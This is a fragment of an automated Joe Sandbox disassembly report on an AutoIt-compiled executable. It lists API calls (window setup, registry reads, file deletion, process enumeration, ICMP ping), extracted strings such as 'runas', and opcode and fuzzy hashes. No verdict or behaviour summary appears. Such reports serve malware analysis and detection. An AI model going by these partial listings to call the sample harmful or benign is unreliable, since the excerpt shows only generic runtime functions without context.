Part of subcall function 00D434D3: LoadCursorW.USER32(00000000,00007F00), ref: 00D434ED
Part of subcall function 00D434D3: LoadIconW.USER32(00000063), ref: 00D43503
Part of subcall function 00D434D3: LoadIconW.USER32(000000A4), ref: 00D43515
Part of subcall function 00D434D3: LoadIconW.USER32(000000A2), ref: 00D43527
Part of subcall function 00D434D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D4353F
Part of subcall function 00D434D3: RegisterClassExW.USER32(?), ref: 00D43590

Part of subcall function 00D435B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D435E1
Part of subcall function 00D435B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D43602
Part of subcall function 00D435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D43368,?), ref: 00D43616
Part of subcall function 00D435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D43368,?), ref: 00D4361F

Part of subcall function 00D4396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D43A3C

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00D83CAA
runas, xrefs: 00D83D75
AutoIt, xrefs: 00D83CA5
0$, xrefs: 00D43495

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-3328958999
Opcode ID: b7a671075fbafc9f97a1d02b4d5cf29f21d0437fbe337cb7f5d1a719a444d930
Instruction ID: b879d94573c1ac3f9af4677789ad498724cc345354d93216ce415958e5d403e8
Opcode Fuzzy Hash: b7a671075fbafc9f97a1d02b4d5cf29f21d0437fbe337cb7f5d1a719a444d930
Instruction Fuzzy Hash: 5851F470108341AFDB01FF749C01DEE7BA9EF95740F44542DF2A6A61A2DB248A9DDB32

Function 00DADC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D455D1,?,?,00D84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D45871

Part of subcall function 00DAEAB0: GetFileAttributesW.KERNEL32(?,00DAD840), ref: 00DAEAB1

FindFirstFileW.KERNEL32(?,?), ref: 00DADCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00DADD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00DADD2C
FindClose.KERNEL32(00000000), ref: 00DADD43
FindClose.KERNEL32(00000000), ref: 00DADD4C

Strings

\*.*, xrefs: 00DADC9D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 3a695d3d9a87cf3e2ffec08a4dab694b06e2f17e9b65aae83f3b3ff9e90e1506
Instruction ID: 8c945cbaa31e71a71249c0dec41296b8acd376c1972302eb3152896fb06e5fc5
Opcode Fuzzy Hash: 3a695d3d9a87cf3e2ffec08a4dab694b06e2f17e9b65aae83f3b3ff9e90e1506
Instruction Fuzzy Hash: 96318E31009345ABC701EB20C8859AFBBE9FEA6310F444D6EF4D692191EB21DA09CB77

Function 00DADD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DADDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00DADDBA
Process32NextW.KERNEL32(00000000,?), ref: 00DADDDA
CloseHandle.KERNEL32(00000000), ref: 00DADE87

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d0c559fb164bc0fbeb7eb259a0325e6ab4d8272c238c6e20d2e0ebb24539f879
Instruction ID: 8ab15840e14c2d0345b71920d78a7d8fe906cb352a150be84a3be34c5b106a85
Opcode Fuzzy Hash: d0c559fb164bc0fbeb7eb259a0325e6ab4d8272c238c6e20d2e0ebb24539f879
Instruction Fuzzy Hash: 0E3161721083019FD710EF60D885AAFBBE9EF95354F04092EF586871A1DB71DA49CBB2

Function 00D4EE30 Relevance: 26.9, APIs: 14, Strings: 1, Instructions: 630windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00D4EF07
timeGetTime.WINMM ref: 00D4F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4F228
TranslateMessage.USER32(?), ref: 00D4F27B
DispatchMessageW.USER32(?), ref: 00D4F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4F29F
Sleep.KERNEL32(0000000A), ref: 00D4F2B1

Strings

(, xrefs: 00D4F264

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID: (
API String ID: 2189390790-2063206799
Opcode ID: f3edd2ab9aba6c166fbf0503939dcfc518e68775af5ac7be351b0864b52ac715
Instruction ID: 598c0663428de3db28e87274359507fa9af08b7c21f3bd39fb53f85a14fbb68a
Opcode Fuzzy Hash: f3edd2ab9aba6c166fbf0503939dcfc518e68775af5ac7be351b0864b52ac715
Instruction Fuzzy Hash: EA42C130604741EFDB28CF24C884BAABBE5FF91304F18452DE595972A2D771E949CBB2

Function 00D5AC3E Relevance: 23.4, APIs: 1, Strings: 12, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d5m0, xrefs: 00D5AE75
`*, xrefs: 00D5AFF9
d0b, xrefs: 00D5AC96, 00D5AD10, 00D5AEA7
d1r0,2, xrefs: 00D5ACA9
e#, xrefs: 00D5AFA9
d1b, xrefs: 00D5AD55, 00D5AE8E
i, xrefs: 00D5B0A3
d10m0, xrefs: 00D5ACF0
(, xrefs: 00D5ADD7
(, xrefs: 00D5AD65
(, xrefs: 00D5AD4D
(, xrefs: 00D5ADC1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID: `*$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$($($($(
API String ID: 0-841311234
Opcode ID: aebd9b085d543e979ff9896e9abc9f506611513ad3983b3a2fa58df6b05cb524
Instruction ID: bb40f9c299937ff6fdaa22db563f95b044d9b2c9e084a2c9b6462b1dd0e0d54e
Opcode Fuzzy Hash: aebd9b085d543e979ff9896e9abc9f506611513ad3983b3a2fa58df6b05cb524
Instruction Fuzzy Hash: DE626A70508341DFCB28DF24C485AAABBE1FF89314F14895EE8998B351DB71D949CFA2

Function 00D4370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D43709,?,?), ref: 00D43777
KillTimer.USER32(?,00000001,?,?,?,?,?,00D43709,?,?), ref: 00D437A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D437C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D43709,?,?), ref: 00D437D1
CreatePopupMenu.USER32 ref: 00D437E5
PostQuitMessage.USER32(00000000), ref: 00D43806

Strings

TaskbarCreated, xrefs: 00D437CC
0$, xrefs: 00D83DF7
0$, xrefs: 00D83DA9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$$0$$TaskbarCreated
API String ID: 129472671-3836791346
Opcode ID: 6bedcc6163296589705b4eec3669a5c1b0013aeaafde275a6b7c7e679c4a4940
Instruction ID: 7960a83c55ac5bce47e319aec2e9e6a1fcdf768e9fd350cf10d39ec244e72333
Opcode Fuzzy Hash: 6bedcc6163296589705b4eec3669a5c1b0013aeaafde275a6b7c7e679c4a4940
Instruction Fuzzy Hash: 3D4118F1240245BBDF142F3CDC4ABB93B69EB45310F088229F696E5291DA78DF688771

Function 00D43624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D43657
RegisterClassExW.USER32(00000030), ref: 00D43681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D43692
InitCommonControlsEx.COMCTL32(?), ref: 00D436AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D436BF
LoadIconW.USER32(000000A9), ref: 00D436D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D436E4

Strings

TaskbarCreated, xrefs: 00D43687
0, xrefs: 00D43639
AutoIt v3 GUI, xrefs: 00D43673
+, xrefs: 00D43640

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5aceabb83aa926ff431ca5e4ab8a6dc01afbbdeaed004cdfe405f3f897ac4070
Instruction ID: 975c5c7d54a2d589088c49b98df8d3bf742af7564b015dab0a6fad5c4b0bb204
Opcode Fuzzy Hash: 5aceabb83aa926ff431ca5e4ab8a6dc01afbbdeaed004cdfe405f3f897ac4070
Instruction Fuzzy Hash: 3E21E2B5902309AFDF009FA9EC89ADDBBB5FB48710F10911AF611E63A0D7B445588FA0

Function 00D809DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D8071A: CreateFileW.KERNEL32(00000000,00000000,?,00D80A84,?,?,00000000,?,00D80A84,00000000,0000000C), ref: 00D80737

GetLastError.KERNEL32 ref: 00D80AEF
__dosmaperr.LIBCMT ref: 00D80AF6
GetFileType.KERNEL32(00000000), ref: 00D80B02
GetLastError.KERNEL32 ref: 00D80B0C
__dosmaperr.LIBCMT ref: 00D80B15
CloseHandle.KERNEL32(00000000), ref: 00D80B35
CloseHandle.KERNEL32(?), ref: 00D80C7F
GetLastError.KERNEL32 ref: 00D80CB1
__dosmaperr.LIBCMT ref: 00D80CB8

Strings

H, xrefs: 00D80C3D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: f6caa49abc4a56e256749acf241ca9bc2dc1215b33fb629cecd01d1063a0f1ff
Instruction ID: 34e63b42e5d2056fea5381a8ea18967235b5d166d6f41bc9c589718008bf0a5d
Opcode Fuzzy Hash: f6caa49abc4a56e256749acf241ca9bc2dc1215b33fb629cecd01d1063a0f1ff
Instruction Fuzzy Hash: 38A11732A042449FDF19AF68D852BAD7FA1EB0A324F184159F811EB3A1D7319D16CB71

Function 00D452A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D45594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00D84B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00D455B2

Part of subcall function 00D45238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D4525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D453C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D84BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D84C3E
RegCloseKey.ADVAPI32(?), ref: 00D84C80
_wcslen.LIBCMT ref: 00D84CE7
_wcslen.LIBCMT ref: 00D84CF6

Strings

Include, xrefs: 00D84BF4, 00D84C35
Software\AutoIt v3\AutoIt, xrefs: 00D453BA
\, xrefs: 00D84CFC
\Include\, xrefs: 00D45381

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 81d6b239b97daeca1c2878ffa1ae33bfaeaadd00d2d86ec5f38e183032de463c
Instruction ID: 4c339fd341f462729b7504e0b5c5460bd12e7abed11962f38c8be90ae68eb55e
Opcode Fuzzy Hash: 81d6b239b97daeca1c2878ffa1ae33bfaeaadd00d2d86ec5f38e183032de463c
Instruction Fuzzy Hash: 6B718E715053019FC700EF66DC419AABBE8FF98350F80442EF465A7261DB71DA49CB76

Function 00D434D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D434DE
LoadCursorW.USER32(00000000,00007F00), ref: 00D434ED
LoadIconW.USER32(00000063), ref: 00D43503
LoadIconW.USER32(000000A4), ref: 00D43515
LoadIconW.USER32(000000A2), ref: 00D43527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D4353F
RegisterClassExW.USER32(?), ref: 00D43590

Part of subcall function 00D43624: GetSysColorBrush.USER32(0000000F), ref: 00D43657
Part of subcall function 00D43624: RegisterClassExW.USER32(00000030), ref: 00D43681
Part of subcall function 00D43624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D43692
Part of subcall function 00D43624: InitCommonControlsEx.COMCTL32(?), ref: 00D436AF
Part of subcall function 00D43624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D436BF
Part of subcall function 00D43624: LoadIconW.USER32(000000A9), ref: 00D436D5
Part of subcall function 00D43624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D436E4

Strings

#, xrefs: 00D43566
AutoIt v3, xrefs: 00D4357F
0, xrefs: 00D4355F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: aa187fdf9d1554d38e42c9ddf9bfd691f83832258eb9ca8252fa079a6f55486d
Instruction ID: 493f99a65ba0e1682850b6ff1e72e0c485b5e1b8c95b0a626b7be4b177854d18
Opcode Fuzzy Hash: aa187fdf9d1554d38e42c9ddf9bfd691f83832258eb9ca8252fa079a6f55486d
Instruction Fuzzy Hash: 10213DB0D00315AFDB109FA6EC45AD9BFB5FB08750F00801EE614B63A0C3B905588F90

Function 00DC0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00DC1019
inet_addr.WSOCK32(?), ref: 00DC1079
gethostbyname.WS2_32(?), ref: 00DC1085
IcmpCreateFile.IPHLPAPI ref: 00DC1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DC1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DC1142
IcmpCloseHandle.IPHLPAPI(?), ref: 00DC1216
WSACleanup.WSOCK32 ref: 00DC121C

Strings

Ping, xrefs: 00DC10D3

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 69eda1986782c1c18ea1a5aa60c5a1677f02b19bf689703293952330f47d533b
Instruction ID: d56e006f278f0a265178b64441b228082d44f32caf8282dff50bed7be61b1c3b
Opcode Fuzzy Hash: 69eda1986782c1c18ea1a5aa60c5a1677f02b19bf689703293952330f47d533b
Instruction Fuzzy Hash: D191AD35604312AFD720DF15C888F16BBE0EF46318F1885ADE5698B7A2C734ED45CBA1

Function 00D4F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00D948C6
t5, xrefs: 00D9463C
t5, xrefs: 00D4F8E0
t5, xrefs: 00D945E9
t5, xrefs: 00D4FBB1
t5, xrefs: 00D4F97E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
API String ID: 0-3061639177
Opcode ID: 07174295d9eced61f42246f25caa57cdd4afa46cee26cbf5f53ac60dcae7bf8f
Instruction ID: db6e3ab96157446ea983f3429d1655ea45cb68913daf9628497958fa9931ae2f
Opcode Fuzzy Hash: 07174295d9eced61f42246f25caa57cdd4afa46cee26cbf5f53ac60dcae7bf8f
Instruction Fuzzy Hash: 1FC27B71A00215DFCB24CF68C881AAEB7B1FF09310F288169E955AB3A1D775ED45CBB1

Function 00D50340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D515F2

Strings

t5, xrefs: 00D50A6A
t5, xrefs: 00D95FF9
t5, xrefs: 00D506B7
t5, xrefs: 00D5075B
t5, xrefs: 00D9604D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5$t5$t5$t5$t5
API String ID: 1385522511-3253990334
Opcode ID: 53a585d74dad80fdb5d1ef311ecbb9dbcafabba60ccb1b2c33177c61dabd71df
Instruction ID: 703f93222d6c10233958bd688d270da9dead2d0d77e2cb6dec0b54706d19e194
Opcode Fuzzy Hash: 53a585d74dad80fdb5d1ef311ecbb9dbcafabba60ccb1b2c33177c61dabd71df
Instruction Fuzzy Hash: B9B25774A08341CFDB24CF18C480A2ABBE1BB99701F18895DED969B351D771ED49CFA2

Function 00D42793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D4327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D432AF
Part of subcall function 00D4327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D432B7
Part of subcall function 00D4327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D432C2
Part of subcall function 00D4327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D432CD
Part of subcall function 00D4327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D432D5
Part of subcall function 00D4327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D432DD

Part of subcall function 00D43205: RegisterWindowMessageW.USER32(00000004,?,00D42964), ref: 00D4325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D42A0A
OleInitialize.OLE32 ref: 00D42A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00D83A0D

Strings

4', xrefs: 00D42948
0$, xrefs: 00D42A2E
(&, xrefs: 00D42932
d(, xrefs: 00D42964
$, xrefs: 00D4280A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&$0$$4'$d($$
API String ID: 1986988660-3144845333
Opcode ID: 9b7a50a9ef1e3f2f775bcfe6b87ff958fb9b61b0f01cbbe429c2139bfaab98e1
Instruction ID: 2a5a562961fa6f27b20447fa08987faf572bde2a637171ca90cc81a5c6ef26bb
